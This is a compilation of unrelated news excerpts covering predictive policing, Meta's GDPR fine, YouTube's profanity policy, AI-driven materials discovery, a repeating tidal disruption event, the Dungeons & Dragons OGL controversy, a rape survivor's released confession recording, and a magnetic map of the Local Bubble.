According to The Guardian, Voyager has suggested factors like Instagram usernames denoting Arab pride or tweeting about Islam could indicate someone is leaning toward extremism. Other companies, such as Palantir, have worked on predictive policing tech. Critics such as the Electronic Frontier Foundation claim that tech can’t predict crime and that algorithms merely perpetuate existing biases.
Data scraping is an issue that Meta has to take seriously. In 2021, it sued an individual for allegedly scraping data on more than 178 million users. Last November, the Irish Data Protection Commission fined the company €265 million ($277 million) for failing to stop bad actors from obtaining millions of people’s phone numbers and other data, which were published elsewhere online. The regulator said Meta failed to comply with GDPR data protection rules.
YouTube is rethinking its approach to colorful language after an uproar. In a statement to The Verge, the Google brand says it’s “making some adjustments” to a profanity policy it unveiled in November after receiving blowback from creators. The rule limits or removes ads on videos where someone swears within the first 15 seconds or has “focal usage” of rude words throughout, and is guaranteed to completely demonetize a clip if swearing either occurs in the first seven seconds or dominates the content.
While that policy wouldn’t necessarily be an issue by itself, YouTube has been applying the criteria to videos uploaded before the new rule took effect. As Kotakuexplains, YouTube has demonetized old videos for channels like RTGame. Producers haven’t had success appealing these decisions, and the company won’t let users edit these videos to pass muster.
Communication has also been a problem. YouTube doesn’t usually tell violators exactly what they did wrong, and creators tend to only learn about the updated policy after the service demonetizes their work. There are also concerns about inconsistency. Some videos are flagged while others aren’t, and a remonetized video might lose that income a day later. Even ProZD’s initial video criticizing the policy, which was designed to honor the rules, lost ad revenue after two days.
Scientists at the U.S. Department of Energy’s (DOE) Brookhaven National Laboratory have successfully demonstrated that autonomous methods can discover new materials. The artificial intelligence (AI)-driven technique led to the discovery of three new nanostructures, including a first-of-its-kind nanoscale “ladder.” The research was published today in Science Advances..
The newly discovered structures were formed by a process called self-assembly, in which a material’s molecules organize themselves into unique patterns. Scientists at Brookhaven’s Center for Functional Nanomaterials (CFN) are experts at directing the self-assembly process, creating templates for materials to form desirable arrangements for applications in microelectronics, catalysis, and more. Their discovery of the nanoscale ladder and other new structures further widens the scope of self-assembly’s applications.
[…]
“gpCAM is a flexible algorithm and software for autonomous experimentation,” said Berkeley Lab scientist and co-author Marcus Noack. “It was used particularly ingeniously in this study to autonomously explore different features of the model.”
[…]
“An old school way of doing material science is to synthesize a sample, measure it, learn from it, and then go back and make a different sample and keep iterating that process,” Yager said. “Instead, we made a sample that has a gradient of every parameter we’re interested in. That single sample is thus a vast collection of many distinct material structures.”
Then, the team brought the sample to NSLS-II, which generates ultrabright X-rays for studying the structure of materials.
[…]
“One of the SMI beamline’s strengths is its ability to focus the X-ray beam on the sample down to microns,” said NSLS-II scientist and co-author Masa Fukuto. “By analyzing how these microbeam X-rays get scattered by the material, we learn about the material’s local structure at the illuminated spot. Measurements at many different spots can then reveal how the local structure varies across the gradient sample. In this work, we let the AI algorithm pick, on the fly, which spot to measure next to maximize the value of each measurement.”
As the sample was measured at the SMI beamline, the algorithm, without human intervention, created of model of the material’s numerous and diverse set of structures. The model updated itself with each subsequent X-ray measurement, making every measurement more insightful and accurate.
The Soft Matter Interfaces (SMI) beamline at the National Synchrotron Light Source II. Credit: Brookhaven National Laboratory
In a matter of hours, the algorithm had identified three key areas in the complex sample for the CFN researchers to study more closely. They used the CFN electron microscopy facility to image those key areas in exquisite detail, uncovering the rails and rungs of a nanoscale ladder, among other novel features.
From start to finish, the experiment ran about six hours. The researchers estimate they would have needed about a month to make this discovery using traditional methods.
“Autonomous methods can tremendously accelerate discovery,” Yager said. “It’s essentially ‘tightening’ the usual discovery loop of science, so that we cycle between hypotheses and measurements more quickly. Beyond just speed, however, autonomous methods increase the scope of what we can study, meaning we can tackle more challenging science problems.”
[…]
“We are now deploying these methods to the broad community of users who come to CFN and NSLS-II to conduct experiments,” Yager said. “Anyone can work with us to accelerate the exploration of their materials research. We foresee this empowering a host of new discoveries in the coming years, including in national priority areas like clean energy and microelectronics.”
Hundreds of millions of light-years away in a distant galaxy, a star orbiting a supermassive black hole is being violently ripped apart under the black hole’s immense gravitational pull. As the star is shredded, its remnants are transformed into a stream of debris that rains back down onto the black hole to form a very hot, very bright disk of material swirling around the black hole, called an accretion disc. This phenomenon—where a star is destroyed by a supermassive black hole and fuels a luminous accretion flare—is known as a tidal disruption event (TDE), and it is predicted that TDEs occur roughly once every 10,000 to 100,000 years in a given galaxy.
[…]
TDEs are usually “once-and-done” because the extreme gravitational field of the SMBH destroys the star, meaning that the SMBH fades back into darkness following the accretion flare. In some instances, however, the high-density core of the star can survive the gravitational interaction with the SMBH, allowing it to orbit the black hole more than once. Researchers call this a repeating partial TDE.
[…]
findings, published in Astrophysical Journal Letters, describe the capture of the star by a SMBH, the stripping of the material each time the star comes close to the black hole, and the delay between when the material is stripped and when it feeds the black hole again.
[…]
Once bound to the SMBH, the star powering the emission from AT2018fyk has been repeatedly stripped of its outer envelope each time it passes through its point of closest approach with the black hole. The stripped outer layers of the star form the bright accretion disk, which researchers can study using X-Ray and Ultraviolet /Optical telescopes that observe light from distant galaxies.
[…]
“Until now, the assumption has been that when we see the aftermath of a close encounter between a star and a supermassive black hole, the outcome will be fatal for the star, that is, the star is completely destroyed,” he says. “But contrary to all other TDEs we know of, when we pointed our telescopes to the same location again several years later, we found that it had re-brightened again. This led us to propose that rather than being fatal, part of the star survived the initial encounter and returned to the same location to be stripped of material once more, explaining the re-brightening phase.”
[…]
So how could a star survive its brush with death? It all comes down to a matter of proximity and trajectory. If the star collided head-on with the black hole and passed the event horizon—the threshold where the speed needed to escape the black hole surpasses the speed of light—the star would be consumed by the black hole. If the star passed very close to the black hole and crossed the so-called “tidal radius”—where the tidal force of the hole is stronger than the gravitational force that keeps the star together—it would be destroyed. In the model they have proposed, the star’s orbit reaches a point of closest approach that is just outside of the tidal radius, but doesn’t cross it completely: some of the material at the stellar surface is stripped by the black hole, but the material at its center remains intact.
[…]
More information: T. Wevers et al, Live to Die Another Day: The Rebrightening of AT 2018fyk as a Repeating Partial Tidal Disruption Event, The Astrophysical Journal Letters (2023). DOI: 10.3847/2041-8213/ac9f36
After a week of silence amid intense backlash, Dungeons & Dragons publisher Wizards of the Coast (WoTC) has finally addressed its community’s concerns about changes to the open gaming license. The open gaming license (OGL) has existed since 2000 and has made it possible for a diverse ecosystem of third-party creators to publish virtual tabletop software, expansion books and more. Many of these creators can make a living thanks to the OGL. But over the last week, a new version of the OGL leaked after WoTC sent it to some top creators. More than 66,000 Dungeons & Dragons fans signed an open letter under the name #OpenDnD ahead of an expected announcement, and waves of users deleted their subscriptions to D&D Beyond, WoTC’s online platform. Now, WoTC admitted that “it’s clear from the reaction that we rolled a 1.” Or, in non-Dungeons and Dragons speak, they screwed up.
“We wanted to ensure that the OGL is for the content creator, the homebrewer, the aspiring designer, our players, and the community — not major corporations to use for their own commercial and promotional purpose,” the company wrote in a statement. But fans have critiqued this language, since WoTC — a subsidiary of Hasbro — is a “major corporation” in itself. Hasbro earned $1.68 billion in revenue during the third quarter of 2022. TechCrunch spoke to content creators who had received the unpublished OGL update from WoTC. The terms of this updated OGL would force any creator making more than $50,000 to report earnings to WoTC. Creators earning over $750,000 in gross revenue would have to pay a 25% royalty. The latter creators are the closest thing that third-party Dungeons & Dragons content has to “major corporations” — but gross revenue is not a reflection of profit, so to refer to these companies in that way is a misnomer. […] The fan community also worried about whether WoTC would be allowed to publish and profit off of third-party work without credit to the original creator. Noah Downs, a partner at Premack Rogers and a Dungeons & Dragons livestreamer, told TechCrunch that there was a clause in the document that granted WoTC a perpetual, royalty-free sublicense to all third-party content created under the OGL.
Now, WoTC appears to be walking back both the royalty clause and the perpetual license. “What [the next OGL] will not contain is any royalty structure. It also will not include the license back provision that some people were afraid was a means for us to steal work. That thought never crossed our minds,” WoTC wrote in a statement. “Under any new OGL, you will own the content you create. We won’t.” WoTC claims that it included this language in the leaked version of the OGL to prevent creators from being able to “incorrectly allege” that WoTC stole their work. Throughout the document, WoTC refers to the document that certain creators received as a draft — however, creators who received the document told TechCrunch that it was sent to them with the intention of getting them to sign off on it. The backlash against these terms was so severe that other tabletop roleplaying game (TTRPG) publishers took action. Paizo is the publisher of Pathfinder, a popular game covered under WoTC’s original OGL. Paizo’s owner and presidents were leaders at Wizards of the Coast at the time that the OGL was originally published in 2000, and wrote in a statement yesterday that the company was prepared to go to court over the idea that WoTC could suddenly revoke the OGL license from existing projects. Along with other publishers like Kobold Press, Chaosium and Legendary Games, Paizo announced it would release its own Open RPG Creative License (ORC). “Ultimately, the collective action of the signatures on the open letter and unsubscribing from D&D Beyond made a difference. We have seen that all they care about is profit, and we are hitting their bottom line,” said Eric Silver, game master of Dungeons & Dragons podcast Join the Party. He told TechCrunch that WoTC’s response on Friday is “just a PR statement.”
“Until we see what they release in clear language, we can’t let our foot off the gas pedal,” Silver said. “The corporate playbook is wait it out until the people get bored; we can’t and we won’t.”
Players heard this message loud and clear, and began flocking to D&D Beyond’s website to cancel their subscriptions and delete their accounts. “DnDBegone” and “StopTheSub” joined OpenDnD as trending on Twitter as players disparaged Wizards of the Coast and parent company Hasbro over its draconian policies. The volume of players on the D&D Beyond website overloaded its servers, causing the Subscription Management page to temporarily crash.
The D&D Beyond page has since been restored, but further outages should be expected by fans wishing to make their voices heard. Thousands of players and content creators have already pulled their support of Dungeons and Dragons via D&D Beyond. Regardless of if Wizards of the Coast can revoke the old OGL, it is clear the bad faith it has earned will take a lot to clear.
A woman who released audio of her rapist’s confession said she wanted to show how “manipulative” abusers can be.
Ellie Wilson, 25, secretly captured Daniel McFarlane admitting to his crimes by setting her phone to record in her handbag.
McFarlane was found guilty of two rape charges and sentenced to five years in prison in July last year.
Ms Wilson said that despite audio and written confessions being used in court, the verdict was not unanimous.
The attacks took place between December 2017 and February 2018 when McFarlane was a medical student at the University of Glasgow.
Since the conviction Ms Wilson, who waived her anonymity, has campaigned on behalf of victims.
Earlier this week Ms Wilson, who was a politics student and champion athlete at the university at the time, released audio on Twitter of a conversation with McFarlane covertly captured the year after the attacks.
In the recording she asks him: “Do you not get how awful it makes me feel when you say ‘I haven’t raped you’ when you have?”
McFarlane replies: “Ellie, we have already established that I have. The people that I need to believe me, believe me. I will tell them the truth one day, but not today.”
When asked how he feels about what he has done, he says: “I feel good knowing I am not in prison.”
Image caption,
Ellie was a university athletics champion
The tweet has been viewed by more than 200,000 people.
Ms Wilson told BBC Scotland’s The Nine she had released the clip because many people wondered what evidence she had to secure a rape conviction.
She said the reaction had been “overwhelmingly positive” although a small minority had been very unkind.
And even with the recording of the confession being posted online some people were still saying ‘he didn’t do it’, Ms Wilson said.
In addition to the audio confession, Ms Wilson had text messages that pointed to McFarlane’s guilt yet she said she was still worried that it would not be enough to secure a conviction.
“The verdict was not unanimous,” she said.
“You can literally have a written confession, an audio confession and not everyone on the jury is going to believe you. I think that says a lot about society.”
Ms Wilson has previously said the experience she had in court was appalling.
You may not realize it in your day-to-day life, but we are all enveloped by a giant “superbubble” that was blown into space by the explosive deaths of a dozen-odd stars. Known as the Local Bubble, this structure extends for about 1,000 light years around the solar system, and is one of countless similar bubbles in our galaxy that are produced by the fallout of supernovas. Cosmic superbubbles have remained fairly mysterious for decades, but recent astronomical advances have finally exposed key details about their evolution and structure. Just within the past few years, researchers have mapped the geometry of the Local Bubble in three dimensions and demonstrated that its surface is an active site of star birth, because it captures gas and dust as it expands into space.
Now, a team of scientists has added another layer to our evolving picture of the Local Bubble by charting the magnetic field of the structure, which is thought to play a major role in star formation. Astronomers led by Theo O’Neill, who conducted the new research during a summer research program at the Center for Astrophysics at Harvard & Smithsonian (CfA), presented “the first-ever 3D map of a magnetic field over a superbubble” on Wednesday at the American Astronomical Society’s 241st annual meeting in Seattle, Washington. The team also unveiled detailed visualizations of their new map, bringing the Local Bubble into sharper focus.
“We think that the entire interstellar medium is really full of all these bubbles that are driven by various forms of feedback from, especially, really massive stars, where they’re outputting energy in some form or another into the space between the stars,” said O’Neill, who just received an undergraduate degree in astronomy-physics and statistics from the University of Virginia, in a joint call with their mentor Alyssa Goodman, an astronomer at CfA who co-authored the new research. […] “Now that we have this map, there’s a lot of cool science that can be done both by us, but hopefully by other people as well,” O’Neill said. “Since stars are clustered, it’s not as if the Sun is super special, and is in the Local Bubble because we’re just lucky. We know that the interstellar medium is full of bubbles like this, and there’s actually a lot of them nearby our own Local Bubble.” “One cool next step will be looking at places where the Local Bubble is nearby other feedback bubbles,” they concluded. “What happens when these bubbles interact, and how does that drive start formation in general, and the overall long-term evolution of galactic structures?”